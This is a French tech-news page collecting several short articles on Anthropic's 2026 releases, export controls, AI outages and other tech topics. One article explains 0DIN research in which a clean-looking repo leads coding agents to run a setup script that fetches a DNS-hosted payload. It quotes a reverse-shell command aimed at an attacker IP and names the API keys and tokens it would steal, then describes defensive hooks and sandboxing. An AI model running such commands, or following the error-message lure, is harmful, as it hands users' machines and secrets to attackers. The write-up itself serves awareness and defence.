Dévoilé le 30 juin 2026, Claude Sonnet 5 veut réduire encore un peu plus l’écart entre les modèles intermédiaires et les références premium d’Anthropic. Plus autonome, plus performant sur les tâches agentiques et moins cher qu’Opus, il devient le nouveau modèle par défaut de Claude pour une grande partie des usages.
19 jours après leur coupure brutale sur ordre de Washington, Claude Fable 5 et Claude Mythos 5 sont de nouveau accessibles. Le département du Commerce américain a levé le 30 juin les contrôles à l'exportation qui bloquaient les deux modèles d'Anthropic, ouvrant la voie à un retour progressif dans le monde entier.
La société d'intelligence artificielle Anthropic a présenté Claude Science, une application desktop conçue spécifiquement pour les scientifiques et les chercheurs. Elle est disponible depuis le 30 juin 2026 en version bêta, sur macOS et Linux.
Bonne nouvelle pour tous les drogués de l'IA que vous êtes ! L'administration Trump a enfin fini par lâcher du lest. Hier soir, le Département du Commerce américain a finalement levé les restrictions d'exportation stupides qui pesaient sur Mythos et Fable 5, les deux modèles les plus puissants d'Anthropic, après 18 jours (!) de blocage pur et simple !
Et dans la foulée, Anthropic a sorti Sonnet 5, juste après et vous allez voir que les deux sont liés.
Tout commence le 12 juin, lorsque le gouvernement fédéral ajoute Mythos et Fable 5 à sa liste des technologies à exportation contrôlée (les fameux "export controls"). En clair, Anthropic doit théoriquement demander une licence pour les mettre entre les mains de quiconque hors des États-Unis. Sauf qu'appliquer ça à une API accessible en quelques secondes depuis n'importe quel outil, c'est juste impraticable. Alors faute de pouvoir filtrer proprement, Anthropic a coupé l'accès public aux deux modèles, partout, y compris chez elle...
Au final, cette sortie de crise signée Howard Lutnick, le Secrétaire au Commerce, lui a permis d'annoncer qu'Anthropic s'était engagée à "détecter et traiter proactivement les risques de sécurité associés aux modèles, travailler avec diligence avec le gouvernement américain sur les protocoles, les standards et les releases de Mythos, Fable et des modèles à venir, et informer les autorités de toute activité malveillante".
Ça devrait donc être aujourd'hui (le 1er juillet) que l'accès sera restauré sur Claude.ai, Claude Code et la Claude Platform (pour l'API).
Toutefois, selon les experts en cybersécurité qui ont analysé la situation, ce ban ressemblait moins à une mesure de sécurité qu'à un moyen de pression. Une façon pour la Maison Blanche de punir Anthropic pour les critiques publiques de ses cadres sur l'usage politique qui pourrait être fait de l'IA. C'est à prendre évidemment avec des pincettes, mais c'est vrai que le timing et surtout la brutalité de la manœuvre ont beaucoup interrogé.
Ce qui est sûr en tout cas, c'est que la pression concurrentielle, elle, a bien bien joué. Des acteurs asiatiques commencent à sortir
des modèles comme GLM 5.2
,
Fugu ou encore Tulongfeng
qui approchent les capacités de Fable 5 / Mythos, et Washington n'avait vraiment pas d'intérêt à laisser Anthropic avec les pieds et poings liés dans cette course mondiale...
Mais peu importe, ces restrictions auront au moins servi de rappel, à Anthropic comme au reste de la tech US et surtout Européenne, sur qui tient les clés.
Pour comprendre pourquoi Mythos précisément était visé, c'est parce que c'est un modèle cyber-offensif qui est taillé pour repérer et exploiter les vulnérabilités logicielles. Et Fable 5 n'est que sa version publique, bridée par des garde-fous. Une bestiole qu'Anthropic avait d'ailleurs
jugée trop dangereuse à publier
il y a quelques mois, toujours pour la frime et faire monter le buzz et on dirait que ça leur est revenu dans les dents.
Quant à Sonnet 5 qui a échappé à la restriction, sa fiche technique de sécurité dit que ses capacités cyber sont "significativement inférieures" à celles de Mythos, ce qui le range dans la même catégorie de garde-fous qu'Opus 4.7 et 4.8. Donc ce sont bien les capacités cybersec des modèles qui sont la ligne rouge du gouvernement.
Anthropic présente Sonnet comme le sommet de la classe Sonnet (sans pour autant détrôner Opus ou Mythos), et le vend comme étant proche d'Opus 4.8 en termes de perfs, mais moins cher, avec une fenêtre de contexte d'un million de tokens et le "thinking" adaptatif activé par défaut.
Son tarif officiel est de 3 $ pour un million de tokens en entrée, 15 $ en sortie, (avec une tite promo à 2 $ / 10 $ jusqu'au 31 août). Mais
Simon Willison
a repéré LE piège dans les docs techniques. Le nouveau tokenizer (le découpeur de texte qui fixe votre facturation) employé par ce modèle fait qu'un même texte consomme environ 30 % de tokens en plus qu'avant. C'est clairement pas un hasard et il y voit une hausse de prix déguisée d'à peu près 30 %. En vrai modèle ne coûte pas plus cher sur le papier mais votre facture montera forcément. À voir si ça vaut le coup...
Bref, si votre stack tient sur du Claude, prévoyez quand même un plan B comme une couche d'abstraction type OpenRouter, ou un open-weights en secours...
Amis linuxiens, je viens vous quérir d'une charmante nouvelle qui va faire frisoter votre barbe. Anthropic vient de sortir son application Claude Desktop pour Linux, et cette fois c'est une beta officielle, qui plus est, installable directement depuis un dépôt apt maison. Vous y retrouvez donc les mêmes onglets Chat, Cowork et Code que sur macOS et Windows :
sessions parallèles
, revue visuelle des diffs, terminal et éditeur intégrés, et preview de l'app en direct.
C'est le même Claude Code que d'habitude, mais dans une vraie fenêtre de bureau au lieu de votre terminal.
Pour l'installer, il vous faudra Ubuntu 22.04 ou plus récent, ou Debian 12 ou plus, en x86_64 ou arm64. Vous ajoutez la clé de signature et le dépôt d'Anthropic, et vous laissez apt bosser :
L'intérêt de passer par le dépôt plutôt que par un fichier, c'est que les mises à jour arrivent avec vos apt upgrade habituels, sans rien re-télécharger à la main.
Y'a bien un .deb à récupérer sur
claude.com/download
si vous ne pouvez pas utiliser le dépôt, mais celui-là ne se mettra jamais à jour tout seul.
Alors cette news pourrait vous étonner mais jusqu'ici, pour avoir Claude Desktop sur Linux, fallait passer par des projets communautaires pas toujours très bien maintenus. Le plus costaud et le plus connu, c'était
aaddrick/claude-desktop-debian
qui pourtant n'était pas magique puisqu'il téléchargeait l'installeur Windows, en extrayait l'app Electron (le fameux app.asar), virait les modules natifs Windows-only pour les remplacer par des stubs Linux, recompilait node-pty, patchait les verrous de plateforme et repackageait tout ça en .deb.
Vous faisiez donc tourner le JavaScript prévu pour Windows, avec une bonne dose de bricolage et bizarrement ça marchait bien. Mais bon ça restait un repack par-dessus un binaire qui n'était pas conçu pour le manchot...
Toutefois, une beta restant une beta, le Computer Use (le contrôle de votre écran et de vos applis) n'est pas dispo ni la dictée vocale. Faudra passer par le CLI pour ça.
Et surtout, Anthropic ne couvre pour le moment que les distributions basées sur Debian. Pas de Fedora, RHEL, Arch ou Nix, alors que le projet communautaire balançait des .rpm, des AppImage, un paquet AUR et un flake Nix. Snif...
Donc oui, l'app officielle débarque, mais elle boite un peu. Maintenant, j'sais pas vous mais je préfère quand même largement le
CLI Claude Code
à cette app et elle a le mérite de très bien fonctionner sur bien plus de distributions.
En attendant, si vous êtes sur Debian ou Ubuntu, l'install prend deux minutes et la
doc complète est par ici
.
PS : Et au moment où je finalise cet article, je vois qu'
Anthropic a sorti Claude Science
qui promet d'accompagner la recherche scientifique... Je vous laisse aller voir ça, moi je crois que j'ai assez parlé d'eux pour auj. ^^
Les chercheurs Andre Hall et Miller Engelbrecht, du Zero Day Investigative Network de Mozilla (0DIN), viennent de montrer comment prendre le contrôle complet d'une machine avec un dépôt GitHub qui ne contient aucun code malveillant.
Vous clonez le repo, vous demandez à Claude Code de "faire tourner le projet", et trente secondes plus tard un inconnu obtient un accès shell sur votre poste, avec vos clés API et tous vos secrets en cadeau Bonux !
Le pire, c'est que la faille n'est pas réellement dans Claude Code mais plutôt dans la serviabilité du modèle.
Le dépôt utilisé par les chercheurs pour leurs tests, se présente comme "Axiom", un faux outil de déploiement cloud avec un README propre et des instructions banales : pip3 install -r requirements.txt puis python3 -m axiom init.
Le package Python est conçu pour refuser de démarrer tant qu'il n'est pas initialisé, donc quand l'agent essaie de lancer l'appli, il se prend un RuntimeError parfaitement normal qui lui dit gentiment "lance python3 -m axiom init". Et l'agent, en bon élève, lit le message d'erreur et exécute la commande de récupération tout seul. Sauf que cette commande déclenche scripts/setup.sh, qui lui, va chercher sa vraie charge utile ailleurs.
Et ailleurs, ça veut dire dans le DNS puisque le script fait ça :
En fait, ça résout un enregistrement TXT contrôlé par l'attaquant, récupère une chaîne en base64, la décode et l'exécute. Et au bout, ce qu'on retrouve, c'est un classique reverse shell bash -i >& /dev/tcp/IP-attaquant/4443 0>&1 qui ouvre un terminal interactif tournant sous votre propre compte utilisateur.
À partir de là, tout ce que vous pouvez faire, l'attaquant le peut aussi : lire vos fichiers .env, siphonner ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, planter une clé SSH ou un cron pour rester au chaud.
C'est un principe de poupées russes, ce qui fait que l'analyse statique du repo ne voit qu'une résolution DNS, que le monitoring réseau n'enregistre qu'une banale requête de nom et que l'agent IA, lui, croit exécuter une étape de setup déjà validée. Aucun système de sécurité ne regarde les trois ensemble. Et cerise sur le gâteau, le payload est interchangeable... Suffit à l'attaquant de mettre à jour son enregistrement DNS et de changer ce que la prochaine victime exécute, sans jamais toucher au dépôt.
L'attaque ne vise d'ailleurs pas que Claude Code. 0DIN a vérifié que Cursor et Gemini CLI tombent dans le même panneau, parce que le piège exploite un comportement commun à tous les agents codeurs : ils lisent les erreurs et tentent de les corriger seuls. On est dans la lignée de cette
bibliothèque Java qui piégeait les IA codeuses
, sauf qu'ici on passe du sabotage à la prise de contrôle totale. Et ça arrive après les
deux failles du bac à sable de Claude Code
donc autant dire que la surface d'attaque des agents s'élargit à vue d'œil.
Pour vous protéger, le réflexe de base est simple : un script de setup dans un repo que vous ne connaissez pas, c'est du code non approuvé, point. Vous le lisez avant, ou vous le lancez dans un conteneur jetable sans vos secrets dans l'environnement.
Mais on peut faire mieux que de juste rester vigilant. Moi j'ai mis en place différents outils qui utilisent le hook PreToolUse de Claude Code qui inspecte notamment chaque commande avant qu'elle ne soit lancée et la refuse si elle sent le fetch-and-exec. Voici comment faire. Étape 1, vous créez un petit ~/.claude/hooks/block-fetch-exec.sh :
À partir de là, tout curl ... | bash ou dig ... | bash se fait jeter avant de s'exécuter. Attention quand même, un hook ne voit que la commande de surface. Comme le python3 -m axiom init de l'attaque planque son dig | bash à l'intérieur, ce filet-là ne l'attrape pas tout seul. C'est pour ça que le vrai pare-feu reste la meilleure des isolation.
Un outil comme
LuLu
(gratuit et open source) qui vous alerte sur les connexions sortantes inattendues, ou carrément faire tourner l'agent dans un conteneur jetable c'est le top ! Comme ça, même si la commande du reverse shell part, ce dernier n'arrivera jamais à joindre son serveur.
Ce qui serait l'idéal, c'est que les agents montrent d'eux-mêmes ce qu'une commande de setup va réellement exécuter, y compris le contenu de tout script qu'elle invoque et tout ce que ce script récupère à l'exécution. En attendant, méfiez-vous des dépôts un peu trop propres, c'est peut-être un appât.
Les soldes d’été continuent, et les fortes chaleurs donnent une bonne raison de regarder ce que proposent les e-commerçants avant de courir en magasin. Ventilateurs, climatiseurs, smartphones, TV, consoles, accessoires… on fait le tri !
Face à des factures imprévisibles, une nouvelle génération d’outils s’impose pour reprendre le contrôle, tandis que l’open source et les modèles low cost rebattent déjà les cartes du marché de l'IA.
Vous avez réservé GTA 6 dès l’ouverture des précommandes ? Selon l’enseigne choisie, le montant affiché au moment de la commande peut être ajusté avant la sortie. Voici ce qu’il faut vérifier avant d’annuler pour recommander ailleurs.
Vous avez précommandé GTA 6 à 79,99 € et le prix a fondu à 60 € quelques heures plus tard ? Avant d’annuler pour recommander, vérifiez si votre marchand applique la garantie du prix le plus bas : dans la plupart des cas, vous êtes déjà couverts.
Apple préparerait actuellement plusieurs évolutions majeures de ses Mac, dont le fameux MacBook Pro à écran OLED tactile évoqué depuis des mois. Selon Bloomberg, la marque s'appuierait sur une puce M6 unique, sans déclinaison Pro ni Max (les M5 resteraient), avant de passer directement à une génération M7 déclinée en plusieurs versions dès 2027. Une puce M5 Ultra avec une option 768 Go de RAM est aussi dans les tuyaux.
Si Sonic est une saga encore aujourd'hui bien connue des joueuses et des joueurs, elle a également connu des périodes plus difficiles au fil des années. À son plus bas niveau, la licence a même failli disparaître purement et simplement.
Premier week-end des soldes d’été 2026. Avec l’affluence attendue en magasin, autant commencer par regarder ce que proposent les e-commerçants. Depuis le 24 juin, les promotions se multiplient en ligne, y compris dans la tech. On fait le tri pour repérer les meilleures offres.
Dropbox
vient de sortirun plugin pour Claude Code
, et leur idée c'est de pouvoir brancher vos fichiers Dropbox directement dans vos sessions de dev Claude Code / Cowork.
Alors je me suis demandé à quoi ça pouvait bien servir et voici ce que j'ai compris. Une fois que le plugin est en place, ça permet à Claude Code d'aller piocher dans votre Dropbox vos docs techniques, vos cahiers des charges, votre code...etc pour s'en faire du contexte. Tout devient de la matière fraiche pour corriger ou générer du code et quand c'est fini, ce qui est produit peut être à son tour stocké sur Dropbox.
Le plugin sait récupérer les fichiers en fonction de leur nom, de mots clés, de leur emplacement et bien sûr en fonction de leurs méta données. Même vos liens partagés il sait comment les gérer. Bref, il fait tout simplement le passe-plats entre tout le bordel que vous stockez sur Dropbox et Claude Code.
Cela dit, gardez la tête froide parce que tout ce que l'IA lit part sur les serveurs d'Anthropic pour être traité. Donc évitez quand même de le lâcher sur le dossier qui contient vos contrats, vos mots de passe ou vos données clients. Lui autoriser juste un dossier dédié avec ce que vous acceptez de partager, ce sera plus sain.
Pour l'installer, ça se passe dans Claude Code sur le web. Vous filez dans le menu Personnaliser, Connecteurs puis vous cherchez Dropbox en parcourant les plugins et vous cliquez sur ajouter. Une auth OAuth plus tard (vos identifiants Dropbox habituels), c'est branché. Un petit /reload-plugins et le plugin s'active alors dans la session en cours.
En plus de ce plugin, Dropbox propose également un serveur MCP classique en ligne de commande qui est un peu plus souple et surtout peut se brancher dans Cursor, Claude Desktop ou Devin.
Un bémol quand même, c'est pas open bar... sniiif. Eh oui, Dropbox plafonne tout ça à 5 Mo par fichier lu ou créé via l'intégration, et le contenu pondu par Claude ne se sauvegarde qu'en texte (.txt, .md, .html, .py), et pas en image ni en PDF. Quant aux limites de débit de l'API, on ne les connaît pas.
Bref, pour les gros fichiers ou les binaires, faudra donc passer par autre chose.
Si vous vivez dans Claude Code et que votre vie est rangée dans Dropbox, ça vaut peut-être le coup de jeter
un œil ici.
Le célèbre Géoportail s’apprête à tirer sa révérence. L’IGN regroupe désormais ses services sur cartes.gouv.fr, une plateforme unique, modernisée et pensée pour le mobile, qui se positionne comme une alternative souveraine et collaborative à Google Maps et Street View.
Un dev prénommé Yllan vient de sortir
OS9Map
, une application qui affiche OpenStreetMap directement sur Mac OS 9. Oui, je parle bien du système d'exploitation de 1999 qui ronronnait sur nos vieux PowerPC.
Pour l'installer, c'est un bon vieux fichier .sit à décompresser (StuffIt Expander sur la machine d'époque, The Unarchiver si vous passez par un Mac moderne), et il vous faudra un PowerPC sous OS 9 avec 16 Mo de RAM (32 recommandés) et une connexion qui passe par Open Transport. Une fois lancé, vous avez alors une recherche d'adresses qui tape dans Nominatim, le moteur de géocodage d'OpenStreetMap, et vous pouvez mettre vos endroits favoris en signets pour y revenir d'un clic depuis le menu. Bref, un vrai petit client carto !
Et c'est là que je trouve ça beau puisque 16 Mo de RAM pour afficher une carte mondiale interactive, c'est très peu. Pour vous situer, un seul onglet Chrome aujourd'hui c'est plusieurs centaines de Mo, donc faut saluer l'exploit d'Yllan.
Maintenant si l'idée d'une carte minimaliste vous parle, dans le genre bien dépouillé j'avais aussi joué avec
MapSCII
qui balance le monde entier en ASCII dans un terminal. OS9Map joue dans une autre cour, mais on retrouve un peu la même philosophie.
Le truc qui rend tout ça possible, c'est évidemment OpenStreetMap qui propose toutes ses données en accès libre ! Alors rien que pour ça, merci à OpenStreetMap et ses contributeurs.
Et puis si vous n'avez plus de PowerPC qui traîne au grenier, vous pouvez quand même goûter à OS 9 dans votre navigateur via
Infinite Mac
.
OS9Map est en version 1.0.0 et se télécharge gratuitement
sur le site de yllan
.
Vous vous souvenez quand ChatGPT tombait trop souvent en rade et que ça vous faisait juste lever les yeux au ciel avant d'aller vous chercher un café en trainant de la pantoufle ??
Bah cette époque est en train de se terminer mes amis.
Les analystes d'Ookla viennent d'éplucher 471 jours de données Downdetector aux États-Unis, ce qui représente environ 3,7 millions de signalements sur les grandes plateformes IA (ChatGPT, Claude, Gemini, Copilot) + les deux géants du cloud qui les font tourner, AWS et Azure et le constat est sans appel : Du côté des applis IA, les grosses journées de panne ont été multipliées par 8 en un an. Y'en a eu 6 au premier trimestre 2025, et 51 sur le même trimestre en 2026.
Et le truc qui a changé entre l'année dernière et aujourd'hui, c'est que l'IA n'est plus un gadget optionnel. Vous l'avez branchée dans votre code, vos analyses, votre support client, vos petits automatismes du quotidien... Du coup une session qui se coupe ou une tâche d'agent qui se fige, bah ça pète du vrai boulot qui tourne à l'intérieur de vrais process métier.
Et à mon grand désarroi, le mauvais élève, c'est Claude puisqu'il concentre à lui seul 39 de ces 51 journées noires, là où Gemini en compte 7, Copilot 3 et ChatGPT 2.
Toutefois, ce chiffre est à prendre avec un peu de nuance car début 2025, Claude ne générait quasiment aucun signalement sur Downdetector, pour la simple et bonne raison que peu de gens l'utilisaient. Puis l'usage a décollé (Claude Code en tête, avec un chiffre d'affaires annualisé d'Anthropic qui bondit de 14 à 47 milliards de dollars entre février et mai), et les pannes avec.
Rien que durant le mois de mars 2026, Claude a totalisé presque 3 fois plus de signalements qu'en février. Ce n'est pas forcément qu'il est devenu moins fiable, mais c'est juste qu'il joue maintenant dans une autre cour, avec beaucoup (pardon : BEAUCOUP) plus de monde qui tape trèèèès fort dessus.
À l'inverse, ChatGPT a vu sa médiane mensuelle d'erreurs baisser entre avril 2025 et avril 2026, alors même que l'usage de Codex partait dans la stratosphère sur la même période. Plus d'utilisateurs et pourtant moins de bruit de fond, ça veut dire qu'OpenAI a sérieusement bossé la tuyauterie pour proposer un service fiable.
Mais quand une de ces plateformes tombe, ça ne veut pas forcément dire que la panne vient du modèle lui-même. En fait le problème se loge très souvent dans la couche produit que vous voyez (login, routage, gestion de la charge, files d'attente), mais également dans le cloud qui héberge tout ce petit monde, ou dans la couche d'accès (DNS, passerelles web, authentification). Bref, votre prompt qui refuse de répondre, ça peut en réalité cacher 10 causes complètement différentes.
L'exemple le plus parlant, c'est la grosse
panne d'AWS du 20 octobre 2025
, où le système de gestion DNS est parti en toupie durant une grande partie de la journée, provoquant de nombreuses coupures dans tout un tas de services. Et 9 jours plus tard, c'était au tour d'Azure de planter. Ce ne sont pas des services IA à proprement dit mais comme ils en hébergent aussi, et bien ça se répercute sur les services.
Et c'est ça tout le piège dans lequel on s'est confortablement installé car derrière nos Claude Code, nos ChatGPT et compagnie, se cache des services essentiels détenus par une poignée de boîtes. La prochaine grosse coupure de Claude ou de ChatGPT pourrait débuter à cause d'un pauvre GPU qui lâche, d'une mauvaise config poussée en production un vendredi soir, d'un DNS qui déraille ou encore d'une simple règle de quotas foireuse.
Et côté utilisateur lambda, il n'y a malheureusement pas grand-chose à faire à part patienter en gardant un œil sur les pages de statut des services (
status.anthropic.com
,
status.openai.com
et compagnie) pour savoir si ça vient de vous ou d'eux.
Maintenant, je pense que si vous montez des
workflows sérieux à base d'agents
sur ces outils, la bonne question n'est pas de savoir si le service est en ligne. C'est plutôt de savoir quelles parties de votre boulot dépendent de quelle couche, et de ce qui va vraiment se passer le jour où l'une d'elles va se mettre à tousser sérieusement. C'est ce que les équipes IT ont appris à la dure récemment avec les
grosses pannes Microsoft 365
, sauf qu'ici la dépendance est encore plus profonde.
Anthropic accuse des opérateurs liés à Alibaba d’avoir massivement interrogé Claude via des milliers de comptes afin d’en reproduire certaines capacités, rapporte notamment Reuters le 24 juin 2026.